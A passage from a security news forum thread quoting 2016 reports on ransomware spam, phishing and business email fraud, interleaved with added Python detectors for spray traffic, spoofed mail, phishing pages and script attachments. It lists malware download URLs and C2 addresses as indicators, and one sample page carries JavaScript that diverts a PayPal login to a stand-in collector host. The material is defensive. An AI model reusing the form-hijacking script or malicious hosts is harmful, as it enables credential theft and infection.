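        tried.add((email, leaked_pw))
        salt, digest = users[email]
        if verify(leaked_pw, salt, digest):
            hits.add(email)
    return sorted(hits)


if __name__ == "__main__":
    for email in accounts_to_reset(LEAK, USERS):
        print("force password reset:", email)
```

The e-mail normalisation matters more than it looks: dumps mix case freely, and a match missed on "BOB@Example.com" is an account left open. Forcing the reset rather than merely warning is what the Netflix notice in the post describes.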


#1735 AplusWebMaster


Posted 08 June 2016 - 04:46 AM

FYI...

Fake 'résumé' SPAM - drops Cerber ransomware
- http://blog.dynamoo....esume-spam.html
8 June 2016 - "This -fake- résumé spam leads to malware:
    From:    Dora Bain
    Date:    7 June 2016 at 03:37
    Subject:    Good morning
    What's Up?
    I visited your website today..
    I'm currently looking for work either full time or as a intern to get experience in the field.
    Please look over my CV and let me know what you think.
    With gratitude,
    Dora Bain


In the sample I saw, the attached file was named Dora-Resume.doc and had a VirusTotal detection rate of 11/56*. The Malwr report** and Hybrid Analysis*** show that a -script- executes that tries to make a political statement along the way.. This downloads a file from 80.82.64.198 /subid1.exe which is then saved as %APPDATA%\us_drones_kills_civilians.exe which VirusTotal gives a detection rate of 20/56[4] and seems to give an overall diagnosis as being Cerber ransomware. The IP address of 80.82.64.198 is allocated to an apparent Seychelles shell company called Quasi Networks Ltd (which is probably Russian). There seems to be little if anything of value in 80.82.64.0/24 which could be a good candidate to block. Incidentally, the IP hosts best-booters .com which is likely to be a DDOS-for-hire site. According to the VT report[5] the malware scans for a response on port 6892 on the IP addresses 85.93.0.0 through to 85.93.63.255. However, this Hybrid Analysis[6] indicates that the only server to respond is on 85.93.0.124 (GuardoMicro SRL, Romania) which is part of the notoriously bad 85.93.0.0/24 which is a good thing to block. That report also shows traffic to ipinfo .io which is a legitimate "what is my IP" service. While not malicious in its own right, it does make a potentially good indicator of compromise.
Recommended blocklist:
80.82.64.0/24
85.93.0.0/24
"
* https://virustotal.c...sis/1465377335/

** https://malwr.com/an...TM0ODJlYWI5N2E/

*** https://www.hybrid-a...vironmentId=100

4] https://virustotal.c...sis/1465377604/
TCP connections
52.29.28.100: https://www.virustot...00/information/

5] https://virustotal.c...sis/1465377604/
TCP connections
52.29.28.100

6] https://www.hybrid-a...vironmentId=100
___

Automated tax refund notification – Phish
- https://myonlinesecu...ation-phishing/
8 June 2016 - "One of the frequent subjects in a phishing attempt is 'Tax returns' or 'tax refunds', where especially in UK, you need to submit your Tax Return online. The phishers have caught on to the fact that in UK -all- government services are now dealt with by a common gateway and you need to register for a Government Gateway account. This one wants your personal details and your credit card and bank details...

Screenshot: https://myonlinesecu...sh-1024x428.png

If you follow the link:   http ://americasfootcenter .com/automated.refund.application.online.start.account.for.special.refund/1255bbc5b01e0284db618c7bc75d643c/registration.php?ip=[redacted]
.. you see a webpage asking for name, address, birth date etc. looking like:
> https://myonlinesecu...sh-1024x560.png
.. Then you are asked for your address and mobile number:
> https://myonlinesecu..._2-1024x461.png
.. Next credit card details:
> https://myonlinesecu...way_phish_3.png
.. Next is Bank details:
> https://myonlinesecu...way_phish_4.png
.. Next is a 'done' page, where you are told that it will take 5 to 7 days to deal with and give you the refund, and you are then automatically forwarded to the genuine gov .uk start page:
> https://myonlinesecu...way_phish_5.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to -steal- your personal, bank, credit card or email and social networking log in details..."

americasfootcenter .com: 50.87.146.116: https://www.virustot...16/information/
>> https://www.virustot...9c4cc/analysis/

>> https://www.virustot...33d87/analysis/
 



Edited by AplusWebMaster, 08 June 2016 - 05:57 AM.

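Two of the Cerber write-ups above give the same network fingerprint: a lookup of ipinfo .io followed by traffic to thousands of hosts (the ACH item counts 16386, the résumé item pins it to port 6892 across 85.93.0.0 through 85.93.63.255, with only 85.93.0.124 answering). That shape, one source, one UDP port, thousands of distinct targets all inside one small block, is cheap to detect from flow records without any signature for the binary. As an added example, not code from dynamoo or myonlinesecurity, here is a Python detector over flow tuples. The flow records are constructed to mimic that behaviour; the ipinfo .io addresses are the three the posts resolved it to, and the thresholds are an assumption.

```python
"""Spot a Cerber-style UDP host spray (thousands of targets, one port, one address
block) in flow records, with the ipinfo.io lookup as a supporting indicator.
Added example; the flow records are constructed, not captured traffic."""
import ipaddress
from collections import defaultdict

# Addresses ipinfo.io resolved to in the posts' VirusTotal lookups.
IPINFO_ADDRS = {"52.3.78.30", "54.84.252.139", "54.88.175.149"}


def covering_network(lo, hi):
    """Smallest IPv4 prefix containing both integer addresses lo and hi."""
    for prefix in range(32, -1, -1):
        net = ipaddress.ip_network("%s/%d" % (ipaddress.IPv4Address(lo), prefix), strict=False)
        if ipaddress.IPv4Address(hi) in net:
            return net


def udp_spray_sources(flows, min_targets=256, max_block_prefix=16):
    """Return {src: report} for hosts sending UDP to at least min_targets distinct
    destinations on one port, all inside a block no larger than /max_block_prefix."""
    per_src = defaultdict(lambda: defaultdict(set))   # src -> dport -> {dst as int}
    ipinfo_clients = set()
    for _ts, src, dst, proto, dport in flows:
        if dst in IPINFO_ADDRS:
            ipinfo_clients.add(src)
        if proto == "udp":
            per_src[src][dport].add(int(ipaddress.IPv4Address(dst)))
    reports = {}
    for src, by_port in per_src.items():
        for dport, dsts in by_port.items():
            if len(dsts) < min_targets:
                continue
            block = covering_network(min(dsts), max(dsts))
            if block.prefixlen < max_block_prefix:
                continue                                  # too scattered to be a spray
            reports[src] = {"dport": dport, "targets": len(dsts),
                            "block": str(block), "ipinfo_lookup": src in ipinfo_clients}
    return reports


def cerber_like_flows():
    """Constructed records (timestamp, src, dst, proto, dport): one ipinfo.io
    lookup, then UDP/6892 to hosts across 85.93.0.0/18, plus unrelated noise
    (DNS and a few HTTPS connections) from a second host."""
    base = int(ipaddress.IPv4Address("85.93.0.0"))
    flows = [(1000, "10.0.0.5", "52.3.78.30", "tcp", 443)]
    for i in range(0, 16384, 7):                          # every 7th address of the /18
        flows.append((1001 + i // 500, "10.0.0.5",
                      str(ipaddress.IPv4Address(base + i)), "udp", 6892))
    flows += [(1000, "10.0.0.9", "10.0.0.1", "udp", 53)] * 50
    flows += [(1002, "10.0.0.9", "198.51.100.%d" % n, "tcp", 443) for n in range(1, 40)]
    return flows


if __name__ == "__main__":
    for src, report in udp_spray_sources(cerber_like_flows()).items():
        print(src, report)
```

The block reported (85.93.0.0/18 here) is also the thing to block at the edge, which matches the /24-and-wider blocklists the posts recommend; the ipinfo .io flag on its own is only a weak signal, since the service is legitimate, so the spray is what should page someone.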


#1736 AplusWebMaster


Posted 09 June 2016 - 07:00 AM

FYI...

'Chat' for Ransom Attempts
- http://blog.trendmic...ansom-attempts/
June 9, 2016 - "... The innovation brought forth by some new JIGSAW variants? Instead of using dark web sites, it communicates to the user via… live chat. The threats displayed by these new variants (detected as Ransom_JIGSAW.H) are similar to those shown by the earlier JIGSAW variants...
JIGSAW ransom note: https://blog.trendmi.../06/jigsaw1.png
One big difference should be apparent: there is now a link which appears to go to a live chat session:
> https://blog.trendmi.../06/jigsaw3.png
The attackers actually have people standing by to answer questions... The cybercriminals behind this JIGSAW variant didn’t build their own chat client; instead they used onWebChat, a publicly available chat platform. A script that calls the onWebChat client is embedded in the website. The connection to onWebchat’s servers is protected with SSL/TLS, making packet capture and interception more difficult in the absence of a proxy intercepting encrypted traffic. We have reached out to onWebChat and informed them of this issue.
Interestingly, the cybercriminal on the other end of the chat conversation doesn’t actually know when the user was infected. The “timer” is only based on a cookie set on the affected machine – if this cookie is deleted, the countdown resets to 24 hours. As a result, the cybercriminals are actually reliant on the user’s honesty when it comes to finding out how much ransom should be paid! There are some perverse incentives at work for cybercriminals to decide to focus on their “customers” (i.e., victims) in this way. Whatever those incentives may be, the victims of this crime now have an immediate, human voice to go to when their files are encrypted. This may predispose them to pay up if they are victimized – something we do not encourage. One more thing to note. While looking into the site hosting this instant chat, we found a -second- piece of malware that used the same site. This one, however, was “only” lockscreen malware, which can be bypassed and removed by booting into safe mode... This kind of “customer-centric” approach to ransomware is unusual, although not entirely unprecedented... Users can likewise take advantage of our free tools such as the Trend Micro Lock Screen Ransomware Tool*, which is designed to detect and remove screen-locker ransomware; as well as Trend Micro Crypto-Ransomware File Decryptor Tool**, which can decrypt certain variants of crypto-ransomware without paying the ransom or the use of the decryption key..."
* https://esupport.tre...rt/1105975.aspx

** https://esupport.tre...US/1114221.aspx
___

Fake 'Fedex' SPAM - leads to Andromeda
- http://blog.dynamoo....gent-fedex.html
8 June 2016 23:21 - "This fake FedEx (or FeDex?) spam has a malicious attachment:
    From:    Secure-FeDex
    Date:    8 June 2016 at 18:17
    Subject:    David Bernard agent Fedex
    Deаr [redacted] ,
    We tried tо delivеr уour item on June 08th, 2016, 10:45 АM.
    The delivеry attempt failеd because thе аddress was business сlоsed оr nobodу сould sign fоr it.
    Тo piсk up the package, please, рrint the receipt that is аttаchеd to this еmаil and visit FеdEx
    office indicated in the invoice. If the pасkagе is nоt piсkеd up within 24 hоurs, it will bе returnеd to thе shipper.
    Receipt Number:  98402839289
    Eхpесted Delivеrу Dаte: June 08th, 2016
    Class: Intеrnаtional Paсkаge Sеrviсe
    Servicе(s): Delivеrу Cоnfirmation
    Status: Notifiсatiоn sent
    Thank you for choosing our service ...


In this case there was an attachment FedEx_track_98404283928.zip which unzipped into a folder FedEx_track_98404283928 containing in turn a -malicious-script- FedEx_track_98404283928.js which (according to Malwr*) attempts to download a binary from one of the following locations:
www .brusasport .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .microsoft .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .mega .net/Brusa/vario/direct/teamviiverupdate2918372.exe
www .google .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .yahoo .com/Brusa/vario/direct/teamviiverupdate2918372.exe
Only the first one is a valid download location, the rest are a smokescreen. The dropped binary has a detection rate of 5/56** but automated analysis [1] [2] [3] is inconclusive. However those reports do seem to indicate attempted network traffic to:
secure .adnxs.metalsystems .it
upfd .pilenga .co.uk
These two subdomains appear to have been hijacked from unrelated Register.IT customers and are hosted on a questionable-looking customer of OVH Italy on 188.165.157.176 ... Other -hijacked- subdomains on the same IP are:
tgr .tecnoagenzia .eu
bmp.pilenga .co.uk
maps.pilenga .co.uk
sundication .twitter.luigilatruffa .com
tit.pilenga .net
trw.pilenga .net
ocsp.pilenga .net
plda.pilenga .net
maps.pilenga .mobi
plda.pilenga .mobi
This Tweet[4] from ‏@pancak3lullz indicates that this IP is associated with Andromeda rather than the usual recent patterns of Locky or Dridex (which has.. err.. dried up recently). It appears to have been a malicious IP for more than a month[5]. Of interest is that almost every part of this chain (including the spam sending IP of 31.27.229.22) is in Italy. As with a great deal of recent spam, this is delivered via a .js script in a ZIP file. If you can configure your mail filters to reject such things then you will be a whole lot safer.
Recommended blocklist:
188.165.157.176/30 "
* https://malwr.com/an...2I0MGIxODc3OTU/

** https://www.virustot...sis/1465421690/

1] https://malwr.com/an...zMxYTEyZmM0YmQ/

2] https://sandbox.deep...11f8fa82586980/

3] https://www.hybrid-a...vironmentId=100

4] https://twitter.com/...191468238983168

5] https://malwr.com/an...zhlOGJlODE3MGI/
___

Increased Risks from Macro-Based Malware
- https://www.us-cert....o-Based-Malware
June 09, 2016 - "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems. Recently, there has been a resurgence of malware that is spread via macros. Individuals and organizations should proactively secure systems against macro-based malware. Users and administrators are encouraged to review CERT's article (link* is external) on the resurgence of macro exploitation and apply recommendations outlined in CERT Australia's report** on macro security."
* https://insights.sei...ave-macros.html
June 8, 2016
** http://www.asd.gov.a...ro_Security.pdf
___

Google Dorking ...
Google Dorking sounds harmless, but it can take your company down. Here's what you need to know to avoid being hacked
- http://www.darkreadi.../a/d-id/1325842
6/9/2016
> http://www.darkreadi...ud-security.asp

- http://arstechnica.c...research-finds/
Jun 9, 2016 - "About 11 percent of shared cloud folders contain nasty surprises, according to recent research..."
___

Rotten Apples: Apple-like Malicious Phishing Domains
- https://www.fireeye....ples_apple.html
June 07, 2016 - "At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some -phishing- domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These -phony-Apple-domains- were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users. Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer..."
(More detail at the fireeye URL above.)
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 09 June 2016 - 01:10 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1737 AplusWebMaster
Posted 13 June 2016 - 11:55 AM

FYI...

Malvertising: How to beat bad ads
- https://blog.malware...o-beat-bad-ads/
June 13, 2016 - "... Malvertising, or malicious advertising, is the use of online advertising to distribute malware with little to no user interaction required. You could be researching business trends on a site like NYTimes .com and, without ever having clicked on an ad, be in trouble. A tiny piece of code hidden deep in the ad [re]directs your computer to criminal servers. These servers catalog details about your computer and its location, and then select the 'right' malware for you... the problem’s only getting worse. In 2015, Google disabled more than 780 million bad ads, a nearly 50% increase over 2014. According to RiskIQ*, in just the first half of 2015, malvertising increased 260% compared against all of 2014... infected ads often use an iframe, or invisible webpage element, to do its work. You don’t even need to click on the ad to activate it — just visit the webpage hosting the ad. (Hence the term 'drive-by download'). The iframe redirects to an exploit landing page, and malicious code attacks your system from the landing page via exploit. The exploit kit delivers malware — and 70 percent of the time, it’s ransomware..."
(More detail at the malwarebytes URL above.)
* https://www.riskiq.c...ag/malvertising




#1738 AplusWebMaster
Posted 14 June 2016 - 02:39 PM

FYI...

Hacks sought to steal $3bln+ through wire-transfer fraud - FBI
- http://www.reuters.c...l-idUSKCN0Z023W
Jun 14, 2016 - "Hackers have sought to steal more than $3 billion from businesses in a pernicious, fast-growing type of scam in which criminals impersonate company executives in emails ordering large wire transfers, the Federal Bureau of Investigation warned on Tuesday. The FBI disclosed the data as it launched a public awareness campaign providing tips on how to defend against such scams... U.S. and foreign victims reported 22,143 cases involving business email compromise cases in which cyber criminals sent requests for some $3.1 billion in fraudulent transfers from October 2013 through last month, according to the FBI. That represents a significant increase from the agency's previous tally, which put attempted losses at $2.3 billion through February of this year. Supervisory Special Agent Mitchell Thompson said victims should notify the FBI immediately if they find they have been victimized in such scams, so the bureau can work with agents overseas to ask foreign banks to -freeze- the funds before fraudsters pull them out of the banking system... The bulk of the cases involved requests to transfer funds to banks in Hong Kong and China, though a total of 79 countries have been identified to date, according to the bureau. Thompson said he could not say how much money victims actually lost through the schemes, but said about one-in-four U.S. victims respond by wiring money to fraudsters... The FBI said the sharp jump in cases since its last tally was due to the high level of recent activity, as well as an effort by law enforcement agencies around the world to identify such scams as business email compromise, rather than generic wire fraud. The FBI said it has seen a 1,300 percent increase in identified exposed losses since January 2015. The size of the losses vary widely from case to case, from about $10,000 to tens of millions of dollars, according to Thompson. Austrian aircraft parts maker FACC said in January that it lost about 50 million euros ($55 million) through such a scam."


>> https://www.fbi.gov/...and-individuals

>> https://www.ic3.gov/...016/160614.aspx

Business Email Compromise
- http://blog.trendmic...ed-bec-schemes/
June 9, 2016 - "... Today, Business Email Compromise (BEC) scammers use this regard of authority to target internal employees who may deal with and handle the finance of the company: the Chief Financial Officers (CFOs). Business Email Compromise (BEC) campaigns can be considered as one of the most dangerous threats that businesses of any size today are at risk of becoming a victim of. Not only does it not rely on detectable malicious components for its success—instead relying on pure deception and social engineering — it targets entities in the company that are responsible for the financial welfare of said company and those vulnerable to such underhanded tactics (such as executives, HR personnel, personal assistants, etc). It is a threat that can (and already has) rob businesses blind. In our continued efforts to study and understand BECs — an effort that also included looking into the BEC incidents of the past couple of years — we discovered some underlying patterns that organizations may find interesting. Some of them include:
• 40% of BECs in the past two years have targeted CFOs more than any other company position;
• 31% of BECs used the position of CEO to set up the scam;
• Some of the most commonly used email subjects for BEC mails include the words ‘Transfer’, ‘Request’, and ‘Urgent’.
Wire frauds - Pick your poison: Apart from the now-infamous assuming of an executive’s identity or “CEO Fraud”, wire frauds can be deployed in a variety of ways — and at a cheap price, too. Malware used in BEC schemes can be purchased online for US$50, while some may even come for free. In other cases, the scam may go further than email spoofing. The cybercriminal can turn to hacking the legitimate email account to ask for wire transfers involving fraudulent accounts on the other end. Through phishing or keyloggers, cybercriminals can steal credentials that would allow them to send wire transfer requests. Some may even take the air of legitimacy a notch higher via a quick phone call to seal the deal. Businesses dealing with foreign suppliers are also ripe targets for payment modification — that is, changing where the payment should be directed to... Because of the duplicitous and insidious nature of BECs, simple best practices or security solutions are not enough to effectively defend against them. BEC scams highlight how employees are the primary and final line of defense when it comes down to protecting an organization’s valued assets. Security awareness and solutions that can go beyond the traditional email threats create the barrier between company response and a thousand-dollar wire transfer..."


Edited by AplusWebMaster, 14 June 2016 - 03:02 PM.


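The FBI and Trend Micro pieces quoted in the post above describe BEC by its shape rather than by any malware: an executive's name on a message from outside the company, a Reply-To that quietly steers the conversation to the attacker, a look-alike sender domain, and subjects built around 'Transfer', 'Request' and 'Urgent'. The following is an added example, not code from either source, of how those header-level patterns can be scored before a mail reaches the CFO. The company domain, the executive roster, the keyword list, the two-edit look-alike threshold and the four sample messages are all constructed assumptions for the illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

OUR_DOMAIN = "example-corp.com"                      # assumption: the protected company
EXECUTIVES = {"jane doe": "CEO", "john roe": "CFO"}  # assumption: names worth impersonating
KEYWORDS = re.compile(r"\b(transfer|request|urgent|payment|wire|invoice)\b", re.I)


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, used to spot look-alike sender domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def analyze(raw: str) -> dict:
    """Score one RFC 5322 message on its headers alone; the body is not needed."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    sender_domain = _domain(addr)
    identity, content = [], []

    # 1. An executive's display name arriving from a domain that is not ours.
    role = EXECUTIVES.get(name.strip().lower())
    if role and sender_domain != OUR_DOMAIN:
        identity.append(f"{role} display name '{name}' sent from external domain {sender_domain}")
    # 2. A sender domain within two edits of ours (examp1e-corp.com and friends).
    if sender_domain != OUR_DOMAIN and 0 < edit_distance(sender_domain, OUR_DOMAIN) <= 2:
        identity.append(f"look-alike sender domain {sender_domain}")
    # 3. Replies diverted to a different domain than the visible sender.
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and _domain(reply_to) != sender_domain:
        identity.append(f"Reply-To {reply_to} diverts replies away from {sender_domain}")
    # 4. The subject vocabulary the statistics above call out.
    words = sorted({w.lower() for w in KEYWORDS.findall(msg.get("Subject", ""))})
    if words:
        content.append("subject keywords: " + ", ".join(words))

    if identity:
        verdict = "quarantine"       # identity games on the From/Reply-To path
    elif content:
        verdict = "flag for review"  # wire-related subject from a plausible sender
    else:
        verdict = "pass"
    return {"from": addr, "indicators": identity + content, "verdict": verdict}


# Constructed messages for the demonstration, not captured samples.
SAMPLES = {
    "ceo_fraud": ("From: Jane Doe <jane.doe@webmail.example>\n"
                  "Subject: Urgent transfer request\n\n"
                  "I need this paid before the board call.\n"),
    "reply_to_divert": ("From: John Roe <john.roe@example-corp.com>\n"
                        "Reply-To: John Roe <jroe.private@webmail.example>\n"
                        "Subject: Payment request\n\n"
                        "Please confirm the supplier's new bank details.\n"),
    "look_alike": ("From: Jane Doe <jane.doe@examp1e-corp.com>\n"
                   "Subject: Quick question\n\nAre you at your desk?\n"),
    "clean": ("From: Bob Smith <bob.smith@example-corp.com>\n"
              "Subject: Lunch menu\n\nPizza on Friday.\n"),
}


def analyze_all(samples=SAMPLES) -> dict:
    return {name: analyze(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, result in analyze_all().items():
        print(f"{name:16} {result['verdict']:16} {result['indicators']}")
```

The identity checks decide the verdict on their own; the subject keywords only promote an otherwise plausible internal message to a review queue, since a real CFO also writes "urgent transfer request" from time to time. Header spoofing of the From address itself is not caught here, which is why the Reply-To check matters: a forged From still has to get the reply somewhere the attacker can read it.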

#1739 AplusWebMaster
Posted 15 June 2016 - 07:37 AM

FYI...

Do NOT run JS email attachments ...
- http://www.infoworld...ransomware.html
Jun 14, 2016 - "Attackers are infecting computers with a new ransomware program called RAA that's written entirely in -JavaScript- and locks users' files by using strong encryption. Most malware programs for Windows are written in compiled programming languages like C or C++ and take the form of portable executable files such as .exe or .dll. Others use command-line scripting such as Windows batch or PowerShell. It's rare to see client-side malware written in web-based languages such as JavaScript, which are primarily intended to be interpreted by browsers. Yet the Windows Script Host, a service built into Windows, can natively execute .js and other scripting files out of the box. Attackers have taken to this technique in recent months, with Microsoft warning about a spike in malicious email attachments containing JavaScript files back in April. Last month, security researchers from ESET warned of a wave of spam that distributes the Locky ransomware through .js attachments. In both of those cases the JavaScript files were used as malware downloaders - scripts designed to download and install a traditional malware program. In the case of RAA, however, the whole ransomware is written in JavaScript. According to experts from tech support forum BleepingComputer*, RAA relies on CryptoJS, a legitimate JavaScript library, to implement its encryption routine. The implementation appears to be solid, using the AES-256 encryption algorithm..."
* http://www.bleepingc...ing-javascript/
___

Advanced phishing tactics used to steal PayPal credentials
- https://blog.malware...al-credentials/
June 14, 2016 - "Phishers are back to using an old tactic in a -new- fashion to get hold of their victims’ credentials. One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe. Always visit sites directly, never follow the URLs presented to you in emails-or-attachments... As reported by UK malware researcher @dvk01uk*, the phishers are using -Javascript- to send the user to the promised PayPal site while the login credentials are being-sent-to-an-entirely-different domain:
> https://twitter.com/...233789531852800
'The javascript runs as soon as the page (HTML attachment) is loaded and -intercepts- all posts to PayPal .com and -diverts- them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.'
In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures)... The original blogpost about this particular phish, including screenshots and code snippets, can be found here:  
> https://myonlinesecu...hishing-attack/

egypt-trips[dot]co: 160.153.162.9: https://www.virustot....9/information/
>> https://www.virustot...3189e/analysis/

>> https://www.virustot...959af/analysis/

>> https://www.virustot...f97d0/analysis/


Edited by AplusWebMaster, 15 June 2016 - 01:28 PM.


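The PayPal phish described in the post above defeats the "hover over the link" lesson because the form's action genuinely points at paypal.com; the script attached to the form's submit event rewrites the destination only at the moment of posting. As an added example, not the researcher's code, here is a static check that can run over an HTML attachment at the gateway: it collects the page's form actions, inline script and visible text, works out which brand the page claims to be, and reports any host outside that brand which the forms or the script would send data to. The brand table, the regular expressions and both sample pages are constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# assumption: brand keyword -> hosts that legitimately receive its logins
BRANDS = {"paypal": {"www.paypal.com", "paypal.com"}}
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)
# Script idioms that take over a form submission: onsubmit, submit listeners,
# programmatic submit() and rewriting form.action.
SUBMIT_HOOK_RE = re.compile(r"onsubmit|addEventListener\(\s*['\"]submit|\.submit\(|\.action\s*=")


class _PageCollector(HTMLParser):
    """Pull out form actions, inline script bodies and visible text."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.scripts, self.text = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def _registrable(url: str) -> str:
    """Crude registrable-domain reduction: www.paypal.com -> paypal.com."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


def analyze_html_attachment(html: str) -> dict:
    page = _PageCollector()
    page.feed(html)
    visible = " ".join(page.text).lower()
    brand = next((b for b in BRANDS if b in visible), None)
    if brand is None:
        return {"brand": None, "verdict": "no brand impersonated",
                "form_external": [], "script_external": [], "submit_hook": False}
    legit = {_registrable("https://" + h) for h in BRANDS[brand]}
    script_src = "\n".join(page.scripts)
    # Relative actions have no host and drop out via the empty string.
    form_external = sorted({_registrable(u) for u in page.form_actions} - legit - {""})
    script_external = sorted({_registrable(u) for u in URL_RE.findall(script_src)} - legit - {""})
    submit_hook = bool(SUBMIT_HOOK_RE.search(script_src))
    if form_external or (script_external and submit_hook):
        verdict = "phish"        # credentials for the brand leave for a foreign host
    elif page.form_actions:
        verdict = "suspicious"   # a login form inside an attachment is rarely legitimate
    else:
        verdict = "ok"
    return {"brand": brand, "form_external": form_external, "script_external": script_external,
            "submit_hook": submit_hook, "verdict": verdict}


# Constructed sample pages; phish.example stands in for the real collector.
PHISH_PAGE = """<html><body>
<h1>PayPal</h1><p>Log in to your PayPal account</p>
<form id="login" method="post" action="https://www.paypal.com/signin">
  <input name="login_email"><input name="login_password" type="password">
  <button>Log In</button></form>
<script>
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault();
  var f = document.getElementById("login");
  f.action = "http://phish.example/wp-content/p.php";
  f.submit();
});
</script></body></html>"""

CLEAN_PAGE = """<html><body><p>Your PayPal receipt for order 1234.</p>
<p><a href="https://www.paypal.com/activity">View activity</a></p></body></html>"""

if __name__ == "__main__":
    for label, html in (("phish", PHISH_PAGE), ("receipt", CLEAN_PAGE)):
        print(label, analyze_html_attachment(html))
```

The point of separating `form_external` from `script_external` is exactly the trick in the post: the form alone looks fine, and only the combination of a foreign host in the script with a submit hook gives the verdict away. Obfuscated script (string splitting, `atob`, `eval`) would hide the URL from this regex; a mail gateway that accepts HTML attachments at all should treat any login form in one as suspicious regardless.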

#1740 AplusWebMaster
Posted 16 June 2016 - 05:56 AM

FYI...

Locky/Dridex trying to come back
- https://myonlinesecu...g-to-come-back/
16 June 2016 - "Since yesterday 15 June 2016, we have been hearing about a slow but steady trickle of Locky ransomware / Dridex banking Trojan -JavaScript- downloaders inside zip file attachments. The first ones I received on my mail server were at about 4 am UTC today. I am pretty sure these are only test mails, because the JavaScript is so well detected and the site linked to inside the JavaScript is a site that was seen several weeks ago & is currently down, although appears to have still been active yesterday at some stage. The emails that I am currently seeing this morning are very basic and simple, but they do always catch the unwary or curious user. They are all pretending to come from various yahoo email addresses with a subject of Photos and a completely blank / -empty- email body. One of the emails looks like:
From: Mitchell <Mitchell842@ yahoo .com>
Date: Thu 16/06/2016 05:55
Subject: Photos
Attachment: Photo.zip


Body content: Blank/Empty

All copies I have seen so far today contain exactly the same docment_380578378.js inside the photo.zip
(VirusTotal Detections 35/55*). Payload Security** shows the download was from shivshanti .in/n78f7gbniu
(VirusTotal detections 46/55***) which shows the same file from 2 weeks ago before the Necurs botnet went down and Locky was unable to spread with its previous intensity. It looks like our short holiday from the onslaught of email delivered malware has come to an end and we should all be prepared for a massive attack over the next few days."
* https://www.virustot...sis/1466045706/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
43.242.215.197
85.17.19.102
195.154.69.90
93.170.123.60
95.211.174.92


*** https://www.virustot...sis/1466045706/

shivshanti .in: 43.242.215.197: https://www.virustot...97/information/
>> https://www.virustot...8c29b/analysis/


Edited by AplusWebMaster, 16 June 2016 - 08:44 AM.


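Two posts in this run end with the same advice: the earlier one on the fake FedEx / Andromeda .js downloader (and the US-CERT note on macro-based malware), and this one on the Locky .js downloader inside Photo.zip, both say to reject such attachments at the mail filter. As an added example, not code from any of the quoted blogs, here is a small Python triage routine that does the part a gateway rule language usually cannot: it opens a ZIP attachment, walks its members, rejects anything Windows Script Host or the shell would run on a double-click, and flags Office documents that either declare macros by extension or carry a vbaProject.bin part inside an otherwise "safe" .docx. The extension lists, the nesting limit, the helper names and the three sample attachments are constructed assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

# File types Windows will run from a double-click (Windows Script Host, cmd, shell).
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
              ".bat", ".cmd", ".scr", ".pif", ".exe", ".com", ".lnk", ".jar"}
# Office formats whose extension already declares macros.
MACRO_EXT = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
# OOXML containers worth opening to look for a VBA part (macro-free ones included).
OOXML_EXT = {".docx", ".dotx", ".xlsx", ".xltx", ".pptx", ".potx"} | MACRO_EXT
# Legacy binary Office: macros cannot be ruled out from the name alone.
LEGACY_OFFICE_EXT = {".doc", ".dot", ".xls", ".xlt", ".ppt", ".pot"}
ARCHIVE_EXT = {".zip"}
MAX_ARCHIVE_DEPTH = 2   # assumption: policy knob, not from the posts


def _ext(name: str) -> str:
    return PurePosixPath(name.replace("\\", "/")).suffix.lower()


def triage_attachment(filename: str, data: bytes, depth: int = 0) -> list:
    """Return the reasons to reject this attachment; an empty list means clean."""
    reasons = []
    ext = _ext(filename)
    if ext in SCRIPT_EXT:
        reasons.append(f"{filename}: script/executable attachment")
    if ext in MACRO_EXT:
        reasons.append(f"{filename}: macro-enabled Office document by extension")
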